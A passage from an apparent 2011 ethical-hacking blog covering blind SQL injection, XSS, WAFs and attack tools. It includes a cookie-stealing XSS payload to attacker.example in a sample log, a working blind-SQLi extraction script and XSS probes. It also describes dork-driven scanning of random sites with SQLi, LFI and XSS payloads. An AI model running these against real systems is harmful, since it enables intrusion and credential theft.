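  '203.0.113.9 - - [03/Jan/2012:10:00:07 +0000] "GET /index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%3d%27%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2e%65%78%61%6d%70%6c%65%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e HTTP/1.1" 200 734',
  '198.51.100.2 - - [03/Jan/2012:10:01:30 +0000] "GET /search?q=%253cScRipt%253eString.fromCharCode(97,108,101,114,116,40,49,41)%253c/sCrIpT%253e HTTP/1.1" 200 640',
];

for (const f of scanAccessLog(SAMPLE_LOG)) {
  console.log(`${f.ip} ${f.indicators.join(",")} ${f.decoded}`);
}
```

A 200 status on the flagged requests is the detail to act on: it means the reflected payload reached users, so the affected parameter needs output encoding regardless of what the filter rejected.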



Wednesday, November 23, 2011

What is Penetration Testing and Pen Testing Distribution?


    Penetration Testing(Pen Testing) is the act of evaluating the Security of system or network by exploiting vulnerabilities. This will determine whether unauthorized or malicious activity is possible in a system. Vulnerability uncovered through the Pen Testing will be presented to the system's owner.


Why Penetration Testing?

• Penetration testing can identify vulnerabilities that automated vulnerability scanners miss.
• Determining the feasibility of a particular set of attack vectors
• Determining which vulnerabilities are critical
• Assessing the magnitude of the potential business and operational impact of successful attacks
• Testing the ability of network defenders to detect and respond to the attacks
• Testing the stability of the system against DDoS attacks (only with the owner's explicit agreement, since such a test can take the service down)



White Box vs Black Box vs Grey Box Testing:
Penetration testing can be performed in different ways. The methods can be classified into three types based on how much the tester knows about the system being tested.

White Box:
In white box testing, the pen tester knows everything about the system: source code, network diagrams, IP addressing information.

White box testing simulates what might happen during an "inside job" or after a leak of sensitive information, where the attacker (a malicious insider) has access to source code, network layouts, and possibly even some passwords.

Black Box:
The pen tester tests the system without prior knowledge of it. This method is also known as blind testing. Black box testing simulates an attack from someone who is unfamiliar with the system (a malicious outsider).

Grey Box:
In this method the pen tester has partial knowledge of the system, for example ordinary user credentials but no source code.

Web application penetration testing:
This testing is used to find web application vulnerabilities such as:

• SQL Injection
• XSS (Cross-Site Scripting)
• Buffer overflow
• Clickjacking
• Denial of Service (DoS/DDoS)

Penetration Testing Tools:
Penetration testing tools are used as part of a penetration test to automate certain tasks, improve testing efficiency, and discover issues that might be difficult to find using manual analysis alone.

As a penetration tester you will need a lot of tools to test the security of a system. Searching for, downloading and installing the required software takes time. You can use a penetration testing distribution instead.

What is a Pen Testing Distribution?
A penetration testing distribution is an open source operating system (derived from Linux or BSD) that bundles the applications needed for testing the security of a system. It is developed specifically for security professionals (pen testers, ethical hackers, forensic investigators, ...).
E.g.: BackTrack 5 Linux.

What is the advantage of a Penetration Testing Distribution?
All the applications required for a security test are gathered in a single operating system, so you don't need to hunt for them individually. Penetration testing distributions are open source and free to use. You can install one on a USB pen drive and carry it anywhere.


    How to use Joomscan to find the Joomla Vulnerability in Backtrack 5 Linux?


Joomscan is a penetration testing tool that helps find vulnerabilities in the Joomla CMS. The updated version can detect 550 known vulnerabilities. Let me show how to use joomscan in BackTrack 5.

    Download the Joomscan from here:
    http://web-center.si/joomscan/joomscan.tar.gz

Step 1: Moving to the pentest folder
Copy or move the downloaded files into the directory
/pentest/web/scanners/joomscan/


Step 2: Set permission
Now you have to make the joomscan script executable. To do this, type the following command in a terminal (if you don't know how to open a terminal at all, please stop reading this and start with the basics of Linux). The command name is lower-case, and u+x is all that is needed; the often-quoted chmod 0777 would also make the script world-writable, which you do not want for a tool you run.
chmod u+x joomscan.pl


    Step 3: Update
    Update the scanner to latest version. To do this, enter the following command in Terminal:
    ./joomscan.pl update


Step 4: Scanning for vulnerabilities
Now everything is ready; scan your Joomla site for vulnerabilities by entering the following command in the terminal:
./joomscan.pl -u www.YourJoomlasite.com




Wait a while and it will list the vulnerabilities found.

This tutorial is for educational purposes only; it is intended for pen testers and ethical hackers scanning sites they are authorized to test.

    Monday, November 7, 2011

    What is Blind Sql Injection ? Web Application Vulnerability Tutorial


The blind SQL injection technique is used when the web application is vulnerable but the query's output is not displayed to the attacker. When the attacker tries SQL injection, the application redirects to some other page or shows a generic page instead of a database error message. Blind SQL injection is harder to carry out than traditional (error- or UNION-based) SQL injection and takes more time and many more requests. There are tools that automate it.


Blind SQL injection works by asking the database a sequence of true/false questions and observing how the page responds to each one.

How to detect a Blind SQL Injection vulnerability?
The web application takes the client's input and places it in a WHERE clause to retrieve data from the database. For instance, say the application takes an id and builds the SQL query like this:
statement = "select * from userinfo where id=" + id;
I hope you know about the WHERE clause and compound conditions (OR, AND): OR and AND combine two conditions. The attacker can find the vulnerability by entering a compound condition as input.
For instance, the attacker can enter the id value as
1 AND 1=1
The query then becomes
SELECT * FROM userinfo WHERE id=1 AND 1=1
If the page renders exactly as it does for id=1, the application may be vulnerable. This type of vulnerability occurs when the developer fails to validate the data type of id (it should only ever be an integer). Here we gave a true condition (1=1). If we use a false condition (1=2) instead, the row is not found and the page changes: an error message, an empty result, or a redirect. So we can conclude: if the condition is true the page stays the same; if it is false, the page differs.

Some functions to know
The following functions (MySQL spellings; other databases have equivalents) are useful for blind SQL injection.
substring(str, pos, length) returns part of a string; which part depends on the arguments given.

For instance substring("hello", 2, 1) returns 'e'.
Here the string is "hello", the character position is 2 (that is 'e'), and the length is 1.

• lower(str) converts the string to lower case
• ascii(c) returns the ASCII value of a character
• length(str) returns the length of the string
• user() returns the current database user (the account the application connects with, not necessarily an administrator)
• database() returns the database name
• version() returns the version of the database
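Putting the detection step and the functions above together, here is an added example (Python with the standard library's sqlite3, written for this edit, not the tutorial's code): a handler that concatenates id into the WHERE clause exactly as in the statement above, a true/false oracle built on whether the normal page comes back, and a binary search over length() and the character codes of substr() that recovers a string one character at a time. The table, its rows and the page strings are constructed; SQLite is used so the example runs offline, so unicode() and sqlite_version() stand in for MySQL's ascii() and version().

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample database (in memory); the rows are made up."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE userinfo (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO userinfo VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret"), (2, "bob", "hunter2")])
    return conn


class VulnerableApp:
    """Models the handler in the post: the id parameter is concatenated
    straight into the WHERE clause. Nothing is echoed except which page
    template was rendered, which is exactly the blind situation."""

    def __init__(self, conn: sqlite3.Connection):
        self.conn = conn
        self.queries = 0                         # request counter (cost of the attack)

    def page_for(self, user_id: str) -> str:
        statement = "SELECT name FROM userinfo WHERE id=" + user_id   # the bug
        self.queries += 1
        try:
            rows = self.conn.execute(statement).fetchall()
        except sqlite3.Error:
            return "error page"                  # syntax error -> generic error page
        return "profile of " + rows[0][0] if rows else "no such user"


def is_injectable(app: VulnerableApp) -> bool:
    """The detection step from the post: a true condition leaves the page
    unchanged, a false one changes it."""
    normal = app.page_for("1")
    return app.page_for("1 AND 1=1") == normal and app.page_for("1 AND 1=2") != normal


def oracle(app: VulnerableApp, condition: str) -> bool:
    """One true/false question: does id=1's page still render with the condition ANDed on?"""
    return app.page_for("1 AND (" + condition + ")") == "profile of admin"


def bsearch_int(app: VulnerableApp, expr: str, lo: int, hi: int) -> int:
    """Binary-search the integer value of SQL expression `expr`, assumed to lie in [lo, hi]."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(app, f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(app: VulnerableApp, sql_expr: str, max_len: int = 64) -> str:
    """Recover the result of `sql_expr` one character at a time.
    SQLite spellings are used: unicode() where MySQL has ascii(), substr()
    for substring(). Assumes ASCII content (raise hi for other code points)."""
    length = bsearch_int(app, f"length({sql_expr})", 0, max_len)
    return "".join(
        chr(bsearch_int(app, f"unicode(substr({sql_expr}, {pos}, 1))", 0, 127))
        for pos in range(1, length + 1)
    )


if __name__ == "__main__":
    app = VulnerableApp(build_db())
    print("injectable:", is_injectable(app))
    print("db version:", extract_string(app, "sqlite_version()"))   # MySQL: version()
    print("admin pw  :", extract_string(app, "(SELECT password FROM userinfo WHERE id=1)"))
    print("requests  :", app.queries)
```

Each character costs about seven requests (log2 of 128) plus a handful for the length, so a 32-character password hash is well over 200 page loads. That is the cost the tools section below is talking about, and it is also why blind injection stands out in web server logs: one client, one parameter, hundreds of requests that differ only in a comparison value.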

Blind SQL Injection Tools:
Blind SQL injection is a time-consuming process when done by hand, because every recovered character needs several requests, so automated tools are better than the manual process. Here is a list of automated tools:

    Meet you at our Next Article with more details about the Blind Sql Injection Attack.

We are providing this information as part of our Ethical Hacking Tutorial. This article was created for understanding web application vulnerabilities. We are not responsible for your illegal activity.


Stop stealing our content. I worked hard to create an article; you simply copy it from us?! I have asked website owners to cite our site as the source at the end of the article. Give respect to our hard work. Otherwise we have no other choice than to report to Google under DMCA copyright.

    Friday, October 14, 2011

    Cross Site Scripting(XSS) Complete Tutorial for Beginners~ Web Application Vulnerability



What is XSS?
Cross Site Scripting, also known as XSS, is one of the most common web application vulnerabilities. It allows an attacker to run his own client-side scripts (especially JavaScript) in web pages viewed by other users.

In a typical XSS attack, a hacker injects malicious JavaScript code into a legitimate website. When a user visits the specially crafted link, the browser executes the malicious JavaScript in the context of that site. A successfully exploited XSS vulnerability allows attackers to mount phishing attacks, steal accounts and even spread worms.
Example: imagine a hacker has discovered an XSS vulnerability in Gmail and injects a malicious script. When a user visits the site, the malicious script executes. The code can be used to redirect users to a fake Gmail page or to capture cookies. Using the stolen cookies, the attacker can log in to your account and change the password.
XSS will be easy to understand if you have the following prerequisites:
• Strong knowledge of HTML and JavaScript (Reference).
• Basic knowledge of the HTTP client-server architecture (Reference)
• [optional] Basic knowledge of server-side programming (PHP, ASP, JSP)

XSS Attack:
Step 1: Finding a vulnerable website
Hackers use Google dorks such as "?search=" or ".php?q=" to find vulnerable sites. Elite (1337) attackers target specific sites instead of using Google search. If you are going to test your own site, you have to check every input on every page for the vulnerability.

Step 2: Testing for the vulnerability:
First of all, we have to find an input field into which we can inject our own script, for example a search box, a username or password field, or any other input.


Test 1:
Once we have found the input field, let us put some string inside it, for instance "BTS". The page will display the result.

Now right-click on the page and select View Source. Search for the string "BTS" which we entered in the input field and note where the input is placed (body text, an attribute value, a script block), because that decides which payload will work later.

Test 2:
Now we are going to check whether the server sanitizes our input or not. To do this, let us input a <script> tag inside the input field.
View the source of the page and find the location where the input was displayed in the previous test.

If our code is not sanitized by the server, the source shows exactly what we entered in the field. If the server sanitizes our input, the code will look like &lt;script&gt; instead. An unchanged <script> in the source indicates that the website is vulnerable to XSS and we can execute our own scripts.

Step 3: Exploiting the vulnerability
Now we know the site is probably vulnerable to XSS. But let us make sure it is fully vulnerable by injecting a complete piece of JavaScript. For instance, let us input <script>alert('BTS')</script>.

The page will now display a pop-up box with the string 'BTS'. We have successfully exploited the XSS. By extending the code with a malicious script, a hacker can steal cookies, deface the site and more.
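Tests 1 and 2 above can be automated. The following is an added example (Python, written for this edit, not the tutorial's code): it looks for a marker string in a response body, reports whether the special characters sent after it came back raw, entity-escaped or stripped, works out the HTML context the reflection landed in (body text, a quoted attribute, a script block), and suggests the next payload for that context. The marker bts7q, the sample responses and the payload table are constructed for the example; against a live site you would submit PROBE through the field and pass the returned HTML to classify_reflection().

```python
import re

MARKER = "bts7q"                 # short and unlikely to occur naturally in a page
SPECIALS = "<>\"'"               # the characters an XSS payload needs to survive
PROBE = MARKER + SPECIALS        # what you type into the field: bts7q<>"'

# Next payload for each reflection context. Text and attribute are the cases
# the tutorial covers; the script case is the usual break-out when input lands
# inside an existing <script> element (the HTML tokenizer ends the element at
# the first </script>, whatever the JavaScript around it says).
PAYLOAD_FOR = {
    "text":          "<script>alert(1)</script>",
    'attribute(")':  '"><script>alert(1)</script>',
    "attribute(')":  "'><script>alert(1)</script>",
    "script":        "</script><script>alert(1)</script>",
}


def context_at(body: str, pos: int) -> str:
    """Where in the HTML does offset `pos` sit: text, script, tag, or attribute(quote)."""
    head = body[:pos]
    last_lt, last_gt = head.rfind("<"), head.rfind(">")
    if last_lt > last_gt:                       # an unclosed '<' means we are inside a tag
        open_quote = None
        for ch in head[last_lt:]:               # track quote parity within the tag
            if open_quote is None and ch in "\"'":
                open_quote = ch
            elif ch == open_quote:
                open_quote = None
        return f"attribute({open_quote})" if open_quote else "tag"
    opened = len(re.findall(r"<script\b", head, re.I))
    closed = len(re.findall(r"</script\s*>", head, re.I))
    return "script" if opened > closed else "text"


def classify_reflection(body: str) -> list:
    """Find every place the marker came back and say how the specials survived."""
    findings = []
    for m in re.finditer(re.escape(MARKER), body):
        tail = body[m.end():m.end() + len(SPECIALS)]
        if tail == SPECIALS:
            kind = "raw"                        # Test 2 outcome: nothing sanitized
        elif tail.startswith("&"):
            kind = "escaped"                    # e.g. &lt;&gt;&quot;&#x27;
        else:
            kind = "stripped"                   # marker survived, specials removed
        ctx = context_at(body, m.start())
        findings.append({
            "offset": m.start(),
            "kind": kind,
            "context": ctx,
            "next_payload": PAYLOAD_FOR.get(ctx, "manual analysis") if kind == "raw" else None,
        })
    return findings


# Constructed responses, as if PROBE had been submitted to six different search pages.
SAMPLE_RESPONSES = {
    "raw_text":   '<html><body><p>search results for bts7q<>"\'</p></body></html>',
    "raw_attr":   '<form><input type="text" name="q" value="bts7q<>"\'"><p>No results</p></form>',
    "raw_script": '<script>var q = "bts7q<>"\'";</script>',
    "escaped":    "<p>search results for bts7q&lt;&gt;&quot;&#x27;</p>",
    "stripped":   "<p>search results for bts7q</p>",
    "absent":     "<p>No results</p>",
}


def summarize(responses: dict = SAMPLE_RESPONSES) -> dict:
    """(kind, context) for every reflection in every sample response."""
    return {name: [(f["kind"], f["context"]) for f in classify_reflection(body)]
            for name, body in responses.items()}


if __name__ == "__main__":
    for name, findings in summarize().items():
        print(f"{name:11s} {findings}")
```

A single probe like this replaces the two manual round trips: it tells you in one response whether anything is reflected at all, whether the dangerous characters survive, and which of the post's payloads (plain tag or "> break-out) to send next. Remember that "escaped" means escaped for this one location; the same value may be reflected elsewhere on the page, which is why the function reports every occurrence.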

Types of XSS based on persistence:
Based on persistence, we can categorize XSS attacks into two types, namely persistent and non-persistent.

Persistent XSS:

A persistent or stored XSS attack occurs when the malicious code submitted by the attacker is saved by the server in the database and is then served to every user who views the affected page.

For example:
Many websites host a support forum where registered users can ask questions by posting messages, which are stored in the database. Imagine an attacker posts a message containing malicious JavaScript code instead. If the server fails to sanitize the input, the injected script is executed whenever a user reads the post. If the injected code is cookie-stealing code, it steals the cookie of every user who reads the post, and with that cookie the attacker can take control of the user's account.


Non-Persistent XSS:

Non-persistent XSS, also referred to as reflected XSS, is the most common type of XSS found nowadays. In this type of attack, the injected code is sent to the server in the HTTP request. The server embeds the input in the HTML and returns it in the HTTP response to the browser. When the browser renders the HTML, it also executes the embedded script. This kind of XSS vulnerability frequently occurs in search fields.

Example:
Consider a project hosting website. To find our favourite project, we just input a related word in the search box. When the search finishes, it displays a message like "search results for yourword". If the server fails to sanitize the input properly, an injected script is executed.

In a reflected XSS attack, the attacker sends a specially crafted link to victims and tricks them into clicking it. When a user clicks the link, the browser sends the injected code to the server, the server reflects it back in its response, and the user's browser executes it.

In addition to these two types, there is a third type called DOM-based XSS; I will explain this attack in a later post.

What can an attacker do with this vulnerability?
• Steal identities and confidential data (credit card details)
• Bypass restrictions in websites
• Session hijacking (stealing sessions)
• Malware attacks
• Website defacement
• Denial of Service (DoS) attacks

    Disclaimer:
    This article is intended for educational purpose only.

    Wednesday, October 12, 2011

    Introduction to Web Application Firewall (WAF) ~ Website Security


What is a WAF? WAF stands for Web Application Firewall. A WAF is a server-side component that inspects and filters the HTTP traffic (requests and responses) between clients and the web application. A standard network firewall works on addresses and ports (OSI layers 3-4) and blocks non-HTTP attacks; a WAF works at the application layer (layer 7) and blocks HTTP attacks. Its main purpose is to provide protection against the top web application vulnerabilities such as XSS (Cross-Site Scripting), SQL injection and RFI. Every day a lot of websites are hacked because of these vulnerabilities. Read our Security News section to learn about the security risks on the Internet.

    The Most common Web Application Vulnerabilities:

    • SQL Injection(SQLi)
    • Cross-Site Scripting (XSS)
    • Broken Authentication and Session Management
    • Insecure Direct Object References
    • Cross-Site Request Forgery (CSRF)
    • Security Misconfiguration
    • Insecure Cryptographic Storage
    • Failure to Restrict URL Access
    • Insufficient Transport Layer Protection
    • Unvalidated Redirects and Forwards


A Web Application Firewall (WAF) should meet the following requirements:
• Protection against the top vulnerabilities (XSS, SQLi, etc.)
• Very few false positives (i.e., it should NEVER disallow an authorized request)
• Strength of default (out of the box) defenses
• Power and ease of learn mode
• Types of vulnerabilities it can prevent
• Detects disclosure of unauthorized content in outbound reply messages, such as credit card and Social Security numbers
• Both positive (allow-list) and negative (block-list) security model support
• Simplified and intuitive user interface
• Cluster mode support
• High performance (milliseconds of latency)
• Complete alerting, forensics and reporting capabilities
• Web services/XML support
• Brute force protection
• Ability to run active (block and log), passive (log only) or bypass mode on the web traffic
• Ability to keep individual users constrained to exactly what they have seen in the current session
• Ability to be configured to prevent ANY specific problem (i.e., emergency/virtual patches)
• Form factor: software vs. hardware (hardware generally preferred)
Top 10 Open Source Web Application Firewalls (WAF):

    1. ModSecurity (Trustwave SpiderLabs)
    2. AQTRONIX WebKnight
    3. ESAPI WAF
    4. WebCastellum
    5. BinarySec
    6. Guardian@JUMPERZ.NET
    7. OpenWAF
    8. Ironbee
    9. Profense
    10. Smoothwall

    Tuesday, October 11, 2011

    Automated Blind SQL Injection Attacking Tools~bsqlbf Brute forcer


What is Blind SQL Injection:
Some websites are vulnerable to SQL injection, but the results of the injection are not visible to the attacker. In this situation blind SQL injection is used. The page with the vulnerability may not be one that displays data, but it will display differently depending on the result of a logical statement injected into the legitimate SQL statement for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered.

There are plenty of automated blind SQL injection tools available. Here I am introducing one of them, bsqlbf (Blind SQL injection Brute Forcer).

This tool is written in Perl and allows extraction of data from blind SQL injections. It accepts custom SQL queries as a command line parameter and works for both integer and string based injections.
    Supported Database:
    • MS-SQL
    • MySQL
    • PostgreSQL
    • Oracle

The tool supports the following attack modes (-type switch):
Type 0: Blind SQL injection based on true and false conditions returned by the back-end server

Type 1: Blind SQL injection based on true and error (e.g. syntax error) responses returned by the back-end server.

    Type 2: Blind SQL Injection in "order by" and "group by".

    Type 3: extracting data with SYS privileges (ORACLE dbms_export_extension exploit)

    Type 4: is O.S code execution (ORACLE dbms_export_extension exploit)

    Type 5: is reading files (ORACLE dbms_export_extension exploit, based on java)

    Type 6: is O.S code execution DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit

    Type 7: is O.S code execution SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), DBA Privs

    -cmd=revshell Type 7 supports meterpreter payload execution, run generator.exe first

    Type 8: is O.S code execution DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions

    -cmd=revshell Type 8 supports meterpreter payload execution, run generator.exe first

For Type 4 (O.S. code execution) the following methods are supported:

    -stype: How you want to execute command:

    SType 0 (default) is based on java..will NOT work against XE.

    SType 1 is against oracle 9 with plsql_native_make_utility.

    SType 2 is against oracle 10 with dbms_scheduler.


Disclaimer:
This article is for educational purposes only. The software mentioned above is developed for penetration testers to test their own web applications for vulnerabilities.

    Sunday, October 9, 2011

    Learn Web Application Exploits and Defenses for free~Penetration Testing


Are you willing to learn web application exploitation and how to defend against it? Here is your chance. Google provides a free codelab for learning web application security.


    Penetration Testing :
    • Learn how hackers find security vulnerabilities!
    • Learn how hackers exploit web applications!
    • Learn how to stop them! 
    This code lab shows how web application vulnerabilities can be exploited and how to defend against these attacks. The best way to learn things is by doing, so you'll get a chance to do some real penetration testing, actually exploiting a real application. Specifically, you'll learn the following:
    • How an application can be attacked using common web security vulnerabilities, like cross-site scripting vulnerabilities (XSS) and cross-site request forgery (XSRF).
    • How to find, fix, and avoid these common vulnerabilities and other bugs that have a security impact, such as denial-of-service, information disclosure, or remote code execution.
    To get the most out of this lab, you should have some familiarity with how a web application works (e.g., general knowledge of HTML, templates, cookies, AJAX, etc.).

    Gruyere 
    This codelab is built around Gruyere /ɡruːˈjɛər/ - a small, cheesy web application that allows its users to publish snippets of text and store assorted files. "Unfortunately," Gruyere has multiple security bugs ranging from cross-site scripting and cross-site request forgery, to information disclosure, denial of service, and remote code execution. The goal of this codelab is to guide you through discovering some of these bugs and learning ways to fix them both in Gruyere and in general.

The codelab is organized by types of vulnerabilities. In each section, you'll find a brief description of a vulnerability and a task to find an instance of that vulnerability in Gruyere. Your job is to play the role of a malicious hacker and find and exploit the security bugs. In this codelab, you'll use both black-box hacking and white-box hacking.

In black-box hacking, you try to find security bugs by experimenting with the application and manipulating input fields and URL parameters, trying to cause application errors, and looking at the HTTP requests and responses to guess server behavior. You do not have access to the source code, although understanding how to view source and being able to view HTTP headers (as you can in Chrome or LiveHTTPHeaders for Firefox) is valuable. Using a web proxy like Burp or WebScarab may be helpful in creating or modifying requests.

In white-box hacking, you have access to the source code and can use automated or manual analysis to identify bugs. You can treat Gruyere as if it's open source: you can read through the source code to try to find bugs. Gruyere is written in Python, so some familiarity with Python can be helpful. However, the security vulnerabilities covered are not Python-specific and you can do most of the lab without even looking at the code.

You can run a local instance of Gruyere to assist in your hacking: for example, you can create an administrator account on your local instance to learn how administrative features work and then apply that knowledge to the instance you want to hack. Security researchers use both hacking techniques, often in combination, in real life.

Each challenge is tagged to indicate which techniques are required to solve it:

• Challenges that can be solved just by using black-box techniques.
• Challenges that require that you look at the Gruyere source code.
• Challenges that require some specific knowledge of Gruyere that will be given in the first hint.

    WARNING: 
    Accessing or attacking a computer system without authorization is illegal in many jurisdictions. While doing this codelab, you are specifically granted authorization to attack the Gruyere application as directed. You may not attack Gruyere in ways other than described in this codelab, nor may you attack App Engine directly or any other Google service. You should use what you learn from the codelab to make your own applications more secure. You should not use it to attack any applications other than your own, and only do that with permission from the appropriate authorities (e.g., your company's security team). 


    Thursday, October 6, 2011

    Hash Code Cracker v1.2 Video Tutorials


    Running Application:

    In Linux:
Terminal: the same procedure is followed for the Linux version; just open a terminal instead of the Command Prompt.


    Using Application for Cracking password:
    How to Crack the Password using Online Cracker Hash Code Cracker v1.2?



    How to Crack the Password using Online Cracker Hash Code Cracker v1.2?



    How to Run Hash Code Cracker Jar using Command Prompt~Password Cracking



    How to start Hash Code Cracker Jar with double Click~Password Cracking



    Tuesday, August 30, 2011

    Xcode SQL Injection / LFI / XSS & Webshell Vulnerability Scanner



XCODE Exploit: vulnerable site and webshell scanner. Once downloaded, extract all the files and run XCodeXploitScanner.exe. Enter a Google dork and click the Dork button; the tool collects links matching the dork and displays them as a list. Once the list is displayed, you can run SQL injection, Local File Inclusion and Cross Site Scripting scans against the sites in the list.

The tool sends injection parameters of the following form to each site (a SQLi probe, a directory-traversal LFI probe and an XSS probe):
'-*/../../../../../../../../../../../../../../etc/passwd%00"><script>alert("XXS Xcode Exploit Scanner Detected")</script>

If the site has a bug, the status will show:

SQLi Vulnerability: www.target.com?blabla.php?=1234'
LFI Vulnerability: www.target.com?blabla.php?=1234/../../../../../../../../../../../../../../etc/passwd%00
XSS Vulnerability: www.target.com?blabla.php?=1234"><script>alert("XXS Xcode Exploit Scanner Detected")</script>


When a status shows "detected", you can click "Open Vuln links" to open the link in your browser.

The tool also includes a webshell hunter, which searches for web shells (C99, R57, C100, ITsecteam_shell, b374k) that have already been uploaded by other hackers.




    © Break The Security. Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com